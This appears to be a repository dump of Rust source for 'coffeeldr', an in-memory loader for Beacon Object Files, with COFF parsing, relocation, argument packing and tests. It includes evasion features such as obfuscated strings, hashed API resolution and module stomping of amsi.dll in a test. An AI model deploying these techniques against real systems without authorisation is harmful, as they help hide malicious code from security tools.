    /// Fails when the symbol cannot be parsed, module cannot be loaded,
    /// or the export cannot be found.
    fn resolve_symbol_address(name: &str, coff: &Coff) -> Result<usize> {
        debug!("Attempting to resolve address for symbol: {}", name);
        // MSVC import prefix differs between architectures.
        let prefix = match coff.arch {
            CoffMachine::X64 => "__imp_",
            CoffMachine::X32 => "__imp__",
        };
        let symbol_name = name
            .strip_prefix(prefix)
            .map_or_else(|| Err(CoffeeLdrError::SymbolIgnored), Ok)?;
        // Beacon* / toWideChar helpers are provided by this loader itself.
        if symbol_name.starts_with(obf!("Beacon")) || symbol_name.starts_with(obf!("toWideChar")) {
            debug!("Resolving Beacon: {}", symbol_name);
            return get_function_internal_address(symbol_name);
        }
        // Dynamic-function-resolution names have the form `MODULE$Function`.
        let (dll, mut function) = symbol_name
            .split_once('$')
            .ok_or_else(|| CoffeeLdrError::ParseError(symbol_name.to_string()))?;
        if let CoffMachine::X32 = coff.arch {
            // Strip the trailing `@N` stdcall-style decoration on x86.
            function = function.split('@').next().unwrap_or(function);
        }
        debug!("Resolving Module {} and Function {}", dll, function);
        let module = {
            let mut handle = get_module_address(dll.to_string(), None);
            if handle.is_null() {
                handle = LoadLibraryA(dll);
                if handle.is_null() {
                    return Err(CoffeeLdrError::ModuleNotFound(dll.to_string()));
                }
                handle
            } else {
                handle
            }
        };
        let addr = get_proc_address(module, function, None);
        if addr.is_null() {
            Err(CoffeeLdrError::FunctionNotFound(symbol_name.to_string()))
        } else {
            Ok(addr as usize)
        }
    }
}
impl Default for CoffSymbol {
fn default() -> Self {
Self { address: null_mut() }
}
}
/// Describes a mapped section of memory, including base, size and attributes.
#[derive(Debug, Clone)]
struct SectionMap {
    /// Base address of the section.
    base: *mut c_void,
    /// Section size in bytes.
    size: usize,
    /// Section characteristics.
    characteristics: u32,
    /// Section name.
    name: String,
}
impl SectionMap {
    /// Copies all COFF sections into the destination memory region.
    ///
    /// Sections with no file backing (`PointerToRawData == 0`, e.g. `.bss`)
    /// are zero-filled at the destination instead of copied.
    ///
    /// Returns the list of mapped sections and the next page-aligned pointer
    /// past the last section (used as the symbol-table base when stomping).
    fn copy_sections(virt_addr: *mut c_void, coff: &Coff) -> (Vec<SectionMap>, *mut c_void) {
        unsafe {
            let sections = &coff.sections;
            let mut base = virt_addr;
            let sections = sections
                .iter()
                .map(|section| {
                    let size = section.SizeOfRawData as usize;
                    let name = Coff::get_section_name(section);
                    if section.PointerToRawData != 0 {
                        debug!("Copying section: {}", name);
                        let address = coff.buffer.as_ptr().add(section.PointerToRawData as usize);
                        volatile_copy_nonoverlapping_memory(base as *mut u8, address.cast_mut(), size);
                    } else {
                        // BUGFIX: zero the DESTINATION memory. The previous code
                        // zeroed `coff.buffer` (the source file image, since
                        // PointerToRawData == 0 points at its start), leaving
                        // stale bytes in the mapped region — which matters when
                        // reusing a stomped module's .text.
                        volatile_set_memory(base as *mut u8, 0, size);
                    }
                    let section_map = SectionMap {
                        base,
                        size,
                        characteristics: section.Characteristics,
                        name,
                    };
                    // Advance to the next page boundary for the following section.
                    base = Coff::page_align((base as usize) + size) as *mut c_void;
                    section_map
                })
                .collect();
            (sections, base)
        }
    }
    /// Applies the correct memory protections to this section.
    ///
    /// The protection is derived from the section's R/W/X characteristic
    /// bits; `PAGE_NOCACHE` is OR-ed in when the section is marked
    /// not-cached.
    ///
    /// # Errors
    ///
    /// Fails if `NtProtectVirtualMemory` fails.
    fn adjust_permissions(&mut self) -> Result<()> {
        info!(
            "Adjusting memory permissions for section: Name = {}, Address = {:?}, Size = {}, Characteristics = 0x{:X}",
            self.name, self.base, self.size, self.characteristics
        );
        let bitmask = self.characteristics & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE);
        let mut protection = if bitmask == 0 {
            PAGE_NOACCESS
        } else if bitmask == IMAGE_SCN_MEM_EXECUTE {
            PAGE_EXECUTE
        } else if bitmask == IMAGE_SCN_MEM_READ {
            PAGE_READONLY
        } else if bitmask == (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE) {
            PAGE_EXECUTE_READ
        } else if bitmask == IMAGE_SCN_MEM_WRITE {
            PAGE_WRITECOPY
        } else if bitmask == (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE) {
            PAGE_EXECUTE_WRITECOPY
        } else if bitmask == (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE) {
            PAGE_READWRITE
        } else if bitmask == (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE) {
            PAGE_EXECUTE_READWRITE
        } else {
            warn!("Unknown protection, using PAGE_EXECUTE_READWRITE");
            PAGE_EXECUTE_READWRITE
        };
        // BUGFIX: IMAGE_SCN_MEM_NOT_CACHED is a section characteristic, not a
        // PAGE_* constant — the old code tested it against the computed
        // `protection` value, which can never match.
        if (self.characteristics & IMAGE_SCN_MEM_NOT_CACHED) == IMAGE_SCN_MEM_NOT_CACHED {
            protection |= PAGE_NOCACHE;
        }
        let mut old = 0;
        if !NT_SUCCESS(NtProtectVirtualMemory(
            NtCurrentProcess(),
            &mut self.base,
            &mut self.size,
            protection,
            &mut old
        )) {
            return Err(CoffeeLdrError::MemoryProtectionError(unsafe { GetLastError() }));
        }
        Ok(())
    }
}
/// Handles relocation of symbols for COFF sections.
struct CoffRelocation<'a> {
    /// Parsed COFF object containing sections and symbols.
    coff: &'a Coff<'a>,
    /// Mapped sections in memory, used to compute relocation targets.
    section_map: &'a [SectionMap],
}
impl<'a> CoffRelocation<'a> {
    /// Creates a relocation helper bound to a specific COFF image and its mapped sections.
    pub fn new(coff: &'a Coff, section_map: &'a [SectionMap]) -> Self {
        Self { coff, section_map }
    }
    /// Applies all relocations for the current COFF image.
    ///
    /// The function iterates over each section, looks up the symbols referenced
    /// by its relocation entries, and adjusts the in-memory image accordingly.
    /// Resolved external functions are written into the symbol table and used
    /// when computing relative or absolute addresses.
    ///
    /// # Errors
    ///
    /// Fails if any relocation type is invalid or unsupported for the current
    /// machine architecture.
    pub fn apply_relocations(
        &self,
        functions: &BTreeMap<String, usize>,
        symbols: &CoffSymbol
    ) -> Result<()> {
        // `index` is the next free slot in the symbol table; it only advances
        // for relocations whose symbol resolved to an imported function.
        let mut index = 0;
        for (i, section) in self.coff.sections.iter().enumerate() {
            // Retrieve relocation entries for the current section
            let relocations = self.coff.get_relocations(section);
            for relocation in relocations.iter() {
                // Look up the symbol associated with the relocation
                let symbol = &self.coff.symbols[relocation.SymbolTableIndex as usize];
                // Compute the address where the relocation should be applied
                let symbol_reloc_addr = (self.section_map[i].base as usize
                    + unsafe { relocation.Anonymous.VirtualAddress } as usize) as *mut c_void;
                // Retrieve the symbol's name
                let name = self.coff.get_symbol_name(symbol);
                if let Some(function_address) = functions.get(&name).map(|&addr| addr as *mut c_void) {
                    unsafe {
                        // Store the resolved address in the next symbol-table slot…
                        symbols
                            .address
                            .add(index)
                            .write_volatile(function_address);
                        // …and apply the relocation so the code references that slot.
                        self.process_relocations(
                            symbol_reloc_addr,
                            function_address,
                            symbols.address.add(index),
                            relocation,
                            symbol
                        )?;
                    };
                    index += 1;
                } else {
                    // Apply the relocation but without a resolved function address (null pointer)
                    self.process_relocations(
                        symbol_reloc_addr,
                        null_mut(),
                        null_mut(),
                        relocation,
                        symbol
                    )?;
                }
            }
        }
        Ok(())
    }
    /// Applies a single relocation entry.
    ///
    /// The relocation is interpreted according to the COFF machine type and
    /// the symbol being referenced. When a resolved function address is
    /// available, it is written into the appropriate location; otherwise,
    /// the relocation is applied relative to the target section base.
    ///
    /// # Errors
    ///
    /// Fails if the relocation kind is not supported for the active architecture.
    fn process_relocations(
        &self,
        reloc_addr: *mut c_void,
        function_address: *mut c_void,
        symbols: *mut *mut c_void,
        relocation: &IMAGE_RELOCATION,
        symbol: &IMAGE_SYMBOL
    ) -> Result<()> {
        debug!(
            "Processing relocation: Type = {}, Symbol Type = {}, StorageClass = {}, Section Number: {}",
            relocation.Type, symbol.Type, symbol.StorageClass, symbol.SectionNumber
        );
        unsafe {
            // Imported (undefined external) symbols: point the instruction at
            // the symbol-table slot holding the resolved function address.
            if symbol.StorageClass == IMAGE_SYM_CLASS_EXTERNAL as u8 && symbol.SectionNumber == 0 {
                match self.coff.arch {
                    CoffMachine::X64 => {
                        if relocation.Type as u32 == IMAGE_REL_AMD64_REL32 && !function_address.is_null() {
                            // RIP-relative displacement to the table slot (not the
                            // function itself), measured from the end of the u32.
                            let relative_address = (symbols as usize)
                                .wrapping_sub(reloc_addr as usize)
                                .wrapping_sub(size_of::<u32>());
                            write_unaligned(reloc_addr as *mut u32, relative_address as u32);
                            return Ok(())
                        }
                    },
                    CoffMachine::X32 => {
                        if relocation.Type as u32 == IMAGE_REL_I386_DIR32 && !function_address.is_null() {
                            // x86 uses an absolute 32-bit address of the table slot.
                            write_unaligned(reloc_addr as *mut u32, symbols as u32);
                            return Ok(())
                        }
                    }
                }
            }
            // NOTE(review): symbols with SectionNumber <= 0 (undefined, absolute
            // or debug) can reach this point when the branch above does not
            // return; `(0 - 1) as usize` would underflow and panic on indexing.
            // Confirm such relocation/symbol combinations cannot occur here.
            let section_addr = self.section_map[(symbol.SectionNumber - 1) as usize].base;
            match self.coff.arch {
                CoffMachine::X64 => {
                    match relocation.Type as u32 {
                        IMAGE_REL_AMD64_ADDR32NB if function_address.is_null() => {
                            write_unaligned(
                                reloc_addr as *mut u32,
                                read_unaligned(reloc_addr as *mut u32)
                                    .wrapping_add((section_addr as usize)
                                        .wrapping_sub(reloc_addr as usize)
                                        .wrapping_sub(size_of::<u32>()) as u32
                                ),
                            );
                        },
                        IMAGE_REL_AMD64_ADDR64 if function_address.is_null() => {
                            // Absolute 64-bit: add the section's load address.
                            write_unaligned(
                                reloc_addr as *mut u64,
                                read_unaligned(reloc_addr as *mut u64)
                                    .wrapping_add(section_addr as u64),
                            );
                        },
                        r @ IMAGE_REL_AMD64_REL32..=IMAGE_REL_AMD64_REL32_5 => {
                            // REL32_1..=REL32_5 carry 1-5 extra displacement bytes
                            // (IMAGE_REL_AMD64_REL32 is 4, so `r - 4` is that count).
                            write_unaligned(
                                reloc_addr as *mut u32,
                                read_unaligned(reloc_addr as *mut u32)
                                    .wrapping_add((section_addr as usize)
                                        .wrapping_sub(reloc_addr as usize)
                                        .wrapping_sub(size_of::<u32>())
                                        .wrapping_sub((r - 4) as usize) as u32
                                ),
                            );
                        },
                        _ => return Err(CoffeeLdrError::InvalidRelocationType(relocation.Type))
                    }
                },
                CoffMachine::X32 => {
                    match relocation.Type as u32 {
                        IMAGE_REL_I386_REL32 if function_address.is_null() => {
                            write_unaligned(
                                reloc_addr as *mut u32,
                                read_unaligned(reloc_addr as *mut u32)
                                    .wrapping_add((section_addr as usize)
                                        .wrapping_sub(reloc_addr as usize)
                                        .wrapping_sub(size_of::<u32>()) as u32
                                )
                            );
                        },
                        IMAGE_REL_I386_DIR32 if function_address.is_null() => {
                            write_unaligned(
                                reloc_addr as *mut u32,
                                read_unaligned(reloc_addr as *mut u32)
                                    .wrapping_add(section_addr as u32)
                            );
                        },
                        _ => return Err(CoffeeLdrError::InvalidRelocationType(relocation.Type))
                    }
                }
            }
        }
        Ok(())
    }
}
/// Reads an entire file into memory using raw Win32 APIs.
///
/// # Errors
///
/// Fails if the path contains an interior NUL byte, the file cannot be
/// opened, or its size cannot be queried.
fn read_file(name: &str) -> Result<Vec<u8>> {
    // CreateFileA expects a NUL-terminated ANSI string.
    let file_name = CString::new(name)
        .map_err(|_| CoffeeLdrError::Msg(s!("invalid cstring")))?;
    let h_file = unsafe {
        CreateFileA(
            file_name.as_ptr().cast(),
            GENERIC_READ,
            FILE_SHARE_READ,
            null_mut(),
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            null_mut(),
        )
    };
    if h_file == INVALID_HANDLE_VALUE {
        return Err(CoffeeLdrError::Msg(s!("failed to open file")));
    }
    // NOTE(review): `h_file` is never closed on any path below (handle leak);
    // consider calling CloseHandle or wrapping the handle in a guard. TODO confirm.
    let size = unsafe { GetFileSize(h_file, null_mut()) };
    if size == INVALID_FILE_SIZE {
        return Err(CoffeeLdrError::Msg(s!("invalid file size")));
    }
    let mut out = vec![0u8; size as usize];
    let mut bytes = 0;
    unsafe {
        // NOTE(review): the ReadFile result and the `bytes` read count are not
        // checked; a failed or short read would silently yield a zero-filled
        // or partially-filled buffer. TODO confirm this is acceptable.
        ReadFile(
            h_file,
            out.as_mut_ptr(),
            out.len() as u32,
            &mut bytes,
            null_mut(),
        );
    }
    Ok(out)
}
/// Releases virtual memory in the current process.
///
/// Thin wrapper that dynamically resolves and calls `ntdll!NtFreeVirtualMemory`
/// through the `dinvoke!` macro. The resulting NTSTATUS is discarded.
#[inline]
fn NtFreeVirtualMemory(
    process_handle: *mut c_void,
    base_address: *mut *mut c_void,
    region_size: *mut usize,
    free_type: u32
) {
    dinvoke!(
        get_ntdll_address(),
        s!("NtFreeVirtualMemory"),
        unsafe extern "system" fn(
            process_handle: *mut c_void,
            base_address: *mut *mut c_void,
            region_size: *mut usize,
            free_type: u32,
        ) -> NTSTATUS,
        process_handle,
        base_address,
        region_size,
        free_type
    );
}
/// Loads a library via `kernel32!LoadLibraryExA`, resolved dynamically.
///
/// The kernel32 base is located by a hashed-name lookup
/// (`2808682670` is presumably the murmur3 hash of kernel32's name — TODO
/// confirm), and the export is invoked through `dinvoke!`, which yields
/// `None` here when resolution fails.
#[inline]
fn LoadLibraryExA(
    lp_lib_file_name: *const u8,
    h_file: *mut c_void,
    dw_flags: u32
) -> Option<*mut c_void> {
    let kernel32 = get_module_address(2808682670u32, Some(dinvk::hash::murmur3));
    dinvoke!(
        kernel32,
        s!("LoadLibraryExA"),
        unsafe extern "system" fn(
            lp_lib_file_name: *const u8,
            h_file: *mut c_void,
            dw_flags: u32,
        ) -> *mut c_void,
        lp_lib_file_name,
        h_file,
        dw_flags
    )
}
#[cfg(test)]
mod tests {
use crate::{*, error::Result};
#[test]
fn test_whoami() -> Result<()> {
let mut coffee = CoffeeLdr::new("bofs/whoami.x64.o")?;
let output = coffee.run("go", None, None)?;
assert!(
output.contains("\\")
|| output.contains("User")
|| output.contains("Account")
|| output.contains("Authority"),
"whoami output does not look valid: {output}"
);
Ok(())
}
#[test]
fn test_stomping() -> Result<()> {
let mut coffee = CoffeeLdr::new("bofs/whoami.x64.o")?.with_module_stomping("amsi.dll");
let output = coffee.run("go", None, None)?;
assert!(
output.contains("\\")
|| output.contains("User")
|| output.contains("Account"),
"whoami output (with stomping) looks invalid: {output}"
);
Ok(())
}
#[test]
fn test_dir() -> Result<()> {
let mut pack = BeaconPack::default();
pack.addstr("C:\\Windows")?;
let args = pack.get_buffer_hex()?;
let mut coffee = CoffeeLdr::new("bofs/dir.x64.o")?;
let output = coffee.run("go", Some(args.as_ptr() as _), Some(args.len()))?;
assert!(
output.contains("Directory of")
|| output.contains("File(s)")
|| output.contains("Dir(s)")
|| output.contains("bytes"),
"dir output does not look valid: {output}"
);
Ok(())
}
#[test]
fn test_buffer_memory() -> Result<()> {
let buffer = include_bytes!("../bofs/whoami.x64.o");
let mut coffee = CoffeeLdr::new(buffer)?;
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | true |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/beacon_pack.rs | src/beacon_pack.rs | use alloc::vec::Vec;
use binrw::io::Write;
use hex::FromHex;
use crate::error::Result;
/// Buffer used to build Beacon-compatible packed arguments.
///
/// The buffer keeps track of the total payload size and exposes helpers
/// for appending integers, strings, wide strings and raw binary data.
#[derive(Default)]
pub struct BeaconPack {
    /// Internal byte buffer backing this pack.
    buffer: Vec<u8>,
    /// Logical size of the packed payload (excluding the size prefix).
    size: u32,
}
impl BeaconPack {
    /// Returns a copy of the packed buffer with the size prefix prepended.
    ///
    /// The resulting vector starts with a 4-byte little-endian length field,
    /// followed by the raw payload accumulated so far.
    pub fn getbuffer(&self) -> Result<Vec<u8>> {
        let mut buf = Vec::with_capacity(4 + self.buffer.len());
        buf.extend_from_slice(&self.size.to_le_bytes());
        buf.extend_from_slice(&self.buffer);
        Ok(buf)
    }
    /// Returns the packed buffer (size prefix included) as raw bytes.
    ///
    /// Despite the name, the observable result has always been the raw packed
    /// bytes: the previous implementation hex-encoded the buffer and then
    /// immediately hex-decoded it again — an identity round-trip — so the
    /// pointless encode/decode has been removed. The name and signature are
    /// kept for backward compatibility.
    ///
    /// # Errors
    ///
    /// Propagates any error produced by [`Self::getbuffer`].
    pub fn get_buffer_hex(&self) -> Result<Vec<u8>> {
        self.getbuffer()
    }
    /// Appends a 2-byte signed integer to the buffer.
    ///
    /// The value is written in little-endian format and the tracked size
    /// is increased accordingly.
    pub fn addshort(&mut self, short: i16) {
        self.write_i16(short);
        self.size += 2;
    }
    /// Appends a 4-byte signed integer to the buffer.
    ///
    /// The value is written in little-endian format and the tracked size
    /// is increased accordingly.
    pub fn addint(&mut self, int: i32) {
        self.write_i32(int);
        self.size += 4;
    }
    /// Appends a UTF-8 string with a length prefix and null terminator.
    ///
    /// # Errors
    ///
    /// Propagates any error produced while writing into the internal buffer.
    pub fn addstr(&mut self, s: &str) -> Result<()> {
        let s_bytes = s.as_bytes();
        // Length prefix counts the trailing NUL.
        let length = s_bytes.len() as u32 + 1;
        self.write_u32(length);
        self.buffer.write_all(s_bytes)?;
        // Null terminator.
        self.write_u8(0);
        self.size += 4 + s_bytes.len() as u32 + 1;
        Ok(())
    }
    /// Appends a UTF-16LE wide string with a length prefix and null terminator.
    ///
    /// This operation is infallible: all writes go into the in-memory buffer.
    pub fn addwstr(&mut self, s: &str) {
        let s_wide: Vec<u16> = s.encode_utf16().collect();
        // Length prefix is in bytes and counts the trailing wide NUL.
        let length = (s_wide.len() as u32 * 2) + 2;
        self.write_u32(length);
        for wchar in s_wide {
            self.write_u16(wchar);
        }
        self.write_u16(0);
        self.size += 4 + length;
    }
    /// Appends a raw binary blob with a length prefix.
    ///
    /// # Errors
    ///
    /// Propagates any error produced while writing into the internal buffer.
    pub fn addbin(&mut self, data: &[u8]) -> Result<()> {
        let length = data.len() as u32;
        self.write_u32(length);
        self.buffer.write_all(data)?;
        self.size += 4 + length;
        Ok(())
    }
    /// Clears the internal buffer and resets the tracked size.
    pub fn reset(&mut self) {
        self.buffer.clear();
        self.size = 0;
    }
}
impl BeaconPack {
    /// Writes a single byte to the buffer.
    fn write_u8(&mut self, value: u8) {
        self.buffer.extend_from_slice(&value.to_le_bytes());
    }
    /// Writes a 2-byte unsigned integer in little-endian format.
    fn write_u16(&mut self, value: u16) {
        self.buffer.extend_from_slice(&value.to_le_bytes());
    }
    /// Writes a 2-byte signed integer in little-endian format.
    fn write_i16(&mut self, value: i16) {
        self.buffer.extend_from_slice(&value.to_le_bytes());
    }
    /// Writes a 4-byte unsigned integer in little-endian format.
    fn write_u32(&mut self, value: u32) {
        self.buffer.extend_from_slice(&value.to_le_bytes());
    }
    /// Writes a 4-byte signed integer in little-endian format.
    fn write_i32(&mut self, value: i32) {
        self.buffer.extend_from_slice(&value.to_le_bytes());
    }
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/coff.rs | src/coff.rs | //! COFF parsing utilities for the CoffeeLdr loader.
use core::ffi::{CStr, c_void};
use alloc::{
string::{String, ToString},
vec::Vec,
};
use log::{debug, warn};
use binrw::{BinRead, binread};
use binrw::io::Cursor;
use crate::error::{CoffError, CoffeeLdrError};
// Architecture definitions for x64
const COFF_MACHINE_X64: u16 = 0x8664;
// Architecture definitions for x32
const COFF_MACHINE_X32: u16 = 0x14c;
/// Limit of sections supported by the Windows loader
const MAX_SECTIONS: u16 = 96;
/// Represents a COFF (Common Object File Format) file.
///
/// `buffer` borrows the raw object-file bytes; the header, symbols and
/// sections are owned values decoded from it, so a `Coff` is only valid
/// for as long as the backing slice lives.
pub struct Coff<'a> {
    /// The COFF file header (`IMAGE_FILE_HEADER`).
    pub file_header: IMAGE_FILE_HEADER,
    /// A vector of COFF symbols (`IMAGE_SYMBOL`).
    pub symbols: Vec<IMAGE_SYMBOL>,
    /// A vector of section headers (`IMAGE_SECTION_HEADER`).
    pub sections: Vec<IMAGE_SECTION_HEADER>,
    /// The raw contents of the file read into memory.
    pub buffer: &'a [u8],
    /// Architecture of the COFF file (x64 or x32).
    pub arch: CoffMachine,
}
impl<'a> Default for Coff<'a> {
fn default() -> Self {
Self {
file_header: IMAGE_FILE_HEADER::default(),
symbols: Vec::new(),
sections: Vec::new(),
buffer: &[],
arch: CoffMachine::X64,
}
}
}
impl<'a> Coff<'a> {
/// Parses a COFF object from a byte slice.
///
/// The slice must contain a valid COFF file header, section table and
/// symbol table. Minimal validation is performed to ensure the layout is
/// consistent.
///
/// # Errors
///
/// Fails when the file is too small, the header is invalid, the
/// architecture is unsupported, or any section or symbol fails to decode.
pub fn parse(buffer: &'a [u8]) -> Result<Self, CoffError> {
debug!("Parsing COFF file header, buffer size: {}", buffer.len());
// Validates that the file has the minimum size to contain a COFF header
if buffer.len() < size_of::<IMAGE_FILE_HEADER>() {
return Err(CoffError::InvalidCoffFile);
}
// Creating a cursor
let mut cursor = Cursor::new(buffer);
// The COFF file header
let file_header = IMAGE_FILE_HEADER::read(&mut cursor)
.map_err(|_| CoffError::InvalidCoffFile)?;
// Detects the architecture of the COFF file and returns an enum `CoffMachine`
let arch = Self::validate_architecture(file_header)?;
// Checks that the number of sections and symbols is valid
let num_sections = file_header.NumberOfSections;
let num_symbols = file_header.NumberOfSymbols;
if num_sections == 0 || num_symbols == 0 {
return Err(CoffError::InvalidSectionsOrSymbols);
}
// Validation of the maximum number of sections (Windows limit)
if num_sections > MAX_SECTIONS {
warn!("Exceeded maximum number of sections: {} > {}", num_sections, MAX_SECTIONS);
return Err(CoffError::SectionLimitExceeded);
}
// A vector of COFF symbols
let symbol_offset = file_header.PointerToSymbolTable as usize;
let mut cursor = Cursor::new(&buffer[symbol_offset..]);
let symbols = (0..num_symbols)
.map(|_| {
IMAGE_SYMBOL::read(&mut cursor)
.map_err(|_| CoffError::InvalidCoffSymbolsFile)
})
.collect::<Result<Vec<IMAGE_SYMBOL>, _>>()?;
// A vector of COFF sections
let section_offset = size_of::<IMAGE_FILE_HEADER>() + file_header.SizeOfOptionalHeader as usize;
let mut section_cursor = Cursor::new(&buffer[section_offset..]);
let sections = (0..num_sections)
.map(|_| {
IMAGE_SECTION_HEADER::read(&mut section_cursor)
.map_err(|_| CoffError::InvalidCoffSectionFile)
})
.collect::<Result<Vec<IMAGE_SECTION_HEADER>, _>>()?;
Ok(Self {
file_header,
symbols,
sections,
buffer,
arch,
})
}
/// Determines the machine architecture from the COFF header.
///
/// # Errors
///
/// Fails if the machine field does not match any supported architecture.
#[inline]
fn validate_architecture(file_header: IMAGE_FILE_HEADER) -> Result<CoffMachine, CoffError> {
match file_header.Machine {
COFF_MACHINE_X64 => Ok(CoffMachine::X64),
COFF_MACHINE_X32 => Ok(CoffMachine::X32),
_ => {
warn!("Unsupported COFF architecture: {:?}", file_header.Machine);
Err(CoffError::UnsupportedArchitecture)
}
}
}
/// Computes the total allocation size needed to load the COFF image.
pub fn size(&self) -> usize {
let length = self
.sections
.iter()
.filter(|section| section.SizeOfRawData > 0)
.map(|section| Self::page_align(section.SizeOfRawData as usize))
.sum();
let total_length = self
.sections
.iter()
.fold(length, |mut total_length, section| {
let relocations = self.get_relocations(section);
relocations.iter().for_each(|relocation| {
let sym = &self.symbols[relocation.SymbolTableIndex as usize];
let name = self.get_symbol_name(sym);
if name.starts_with("__imp_") {
total_length += size_of::<*const c_void>();
}
});
total_length
});
debug!("Total image size after alignment: {} bytes", total_length);
Self::page_align(total_length)
}
/// Returns relocation entries for the specified section.
///
/// Invalid relocations are logged and skipped, allowing parsing to proceed.
pub fn get_relocations(&self, section: &IMAGE_SECTION_HEADER) -> Vec<IMAGE_RELOCATION> {
let reloc_offset = section.PointerToRelocations as usize;
let num_relocs = section.NumberOfRelocations as usize;
let mut relocations = Vec::with_capacity(num_relocs);
let mut cursor = Cursor::new(&self.buffer[reloc_offset..]);
for _ in 0..num_relocs {
match IMAGE_RELOCATION::read(&mut cursor) {
Ok(reloc) => relocations.push(reloc),
Err(_e) => {
debug!("Failed to read relocation: {_e:?}");
continue;
}
}
}
relocations
}
/// Reads the symbol name, handling short names and long names from the string table.
pub fn get_symbol_name(&self, symtbl: &IMAGE_SYMBOL) -> String {
unsafe {
let name = if symtbl.N.ShortName[0] != 0 {
String::from_utf8_lossy(&symtbl.N.ShortName).into_owned()
} else {
let long_name_offset = symtbl.N.Name.Long as usize;
let string_table_offset = self.file_header.PointerToSymbolTable as usize
+ self.file_header.NumberOfSymbols as usize * size_of::<IMAGE_SYMBOL>();
// Retrieve the name from the string table
let offset = string_table_offset + long_name_offset;
let name_ptr = &self.buffer[offset] as *const u8;
CStr::from_ptr(name_ptr.cast())
.to_string_lossy()
.into_owned()
};
name.trim_end_matches('\0').to_string()
}
}
/// Rounds a value up to the next page boundary.
#[inline]
pub fn page_align(page: usize) -> usize {
const SIZE_OF_PAGE: usize = 0x1000;
(page + SIZE_OF_PAGE - 1) & !(SIZE_OF_PAGE - 1)
}
/// Extracts the section name, trimming trailing NUL bytes.
#[inline]
pub fn get_section_name(section: &IMAGE_SECTION_HEADER) -> String {
let s = String::from_utf8_lossy(§ion.Name);
s.trim_end_matches('\0').to_string()
}
/// Determines whether a symbol type describes a function.
#[inline]
pub fn is_fcn(ty: u16) -> bool {
(ty & 0x30) == (2 << 4)
}
}
/// Represents the architecture of the COFF file.
#[derive(Debug, PartialEq, Hash, Clone, Copy, Eq, PartialOrd, Ord)]
pub enum CoffMachine {
    /// 64-bit architecture.
    X64,
    /// 32-bit architecture.
    X32,
}
impl CoffMachine {
    /// Validates that the COFF architecture matches the host process.
    ///
    /// # Errors
    ///
    /// Fails if the COFF architecture does not match the current pointer width.
    #[inline]
    pub fn check_architecture(&self) -> Result<(), CoffeeLdrError> {
        // Compute the (expected, actual) pair only when the image cannot run
        // inside this process; `None` means the architectures agree.
        let mismatch = match self {
            CoffMachine::X32 => cfg!(target_pointer_width = "64").then_some(("x32", "x64")),
            CoffMachine::X64 => cfg!(target_pointer_width = "32").then_some(("x64", "x32")),
        };
        match mismatch {
            Some((expected, actual)) => Err(CoffeeLdrError::ArchitectureMismatch { expected, actual }),
            None => Ok(()),
        }
    }
}
/// Represents the COFF data source.
///
/// Lets callers pass either a path on disk or an in-memory buffer; the
/// `From` impls below provide ergonomic conversion from `&str`, `&[u8]`
/// and fixed-size byte arrays.
pub enum CoffSource<'a> {
    /// COFF file indicated by a string representing the file path.
    File(&'a str),
    /// Memory buffer containing COFF data.
    Buffer(&'a [u8]),
}
impl<'a> From<&'a str> for CoffSource<'a> {
    /// Treats a string as a file path.
    fn from(file: &'a str) -> Self {
        CoffSource::File(file)
    }
}
impl<'a, const N: usize> From<&'a [u8; N]> for CoffSource<'a> {
    /// Treats a fixed-size byte array as an in-memory COFF image.
    fn from(buffer: &'a [u8; N]) -> Self {
        CoffSource::Buffer(buffer)
    }
}
impl<'a> From<&'a [u8]> for CoffSource<'a> {
    /// Treats a byte slice as an in-memory COFF image.
    fn from(buffer: &'a [u8]) -> Self {
        CoffSource::Buffer(buffer)
    }
}
/// Represents the file header of a COFF (Common Object File Format) file.
///
/// Decoded by `binrw` as little-endian, matching the on-disk layout.
#[binread]
#[derive(Default, Debug, Clone, Copy)]
#[br(little)]
#[repr(C)]
pub struct IMAGE_FILE_HEADER {
    /// The target machine architecture (e.g., x64, x32).
    pub Machine: u16,
    /// The number of sections in the COFF file.
    pub NumberOfSections: u16,
    /// The timestamp when the file was created.
    pub TimeDateStamp: u32,
    /// The file offset of the symbol table.
    pub PointerToSymbolTable: u32,
    /// The number of symbols in the COFF file.
    pub NumberOfSymbols: u32,
    /// The size of the optional header (zero for object files).
    pub SizeOfOptionalHeader: u16,
    /// The characteristics of the file.
    pub Characteristics: u16,
}
/// Represents a symbol in the COFF symbol table.
///
/// The 8-byte name field is first read as raw bytes (`name_raw`, a `binrw`
/// temp field) and then re-interpreted as the `IMAGE_SYMBOL_0` union via an
/// unaligned read in the `#[br(calc = ...)]` expression below.
#[binread]
#[derive(Clone, Copy)]
#[br(little)]
#[repr(C, packed(2))]
pub struct IMAGE_SYMBOL {
    #[br(temp)]
    name_raw: [u8; 8],
    /// The value associated with the symbol.
    pub Value: u32,
    /// The section number that contains the symbol (0 = undefined/external).
    pub SectionNumber: i16,
    /// The type of the symbol.
    pub Type: u16,
    /// The storage class of the symbol (e.g., external, static).
    pub StorageClass: u8,
    /// The number of auxiliary symbol records.
    pub NumberOfAuxSymbols: u8,
    #[br(calc = unsafe {
        core::ptr::read_unaligned(name_raw.as_ptr() as *const IMAGE_SYMBOL_0)
    })]
    pub N: IMAGE_SYMBOL_0,
}
/// A union representing different ways a symbol name can be stored.
#[repr(C, packed(2))]
#[derive(Clone, Copy)]
pub union IMAGE_SYMBOL_0 {
    /// A short symbol name (8 bytes, inline).
    pub ShortName: [u8; 8],
    /// A long symbol name reference into the string table.
    pub Name: IMAGE_SYMBOL_0_0,
    /// Long symbol name stored as a pair of u32 values.
    pub LongName: [u32; 2],
}
/// The long-name reference of a symbol.
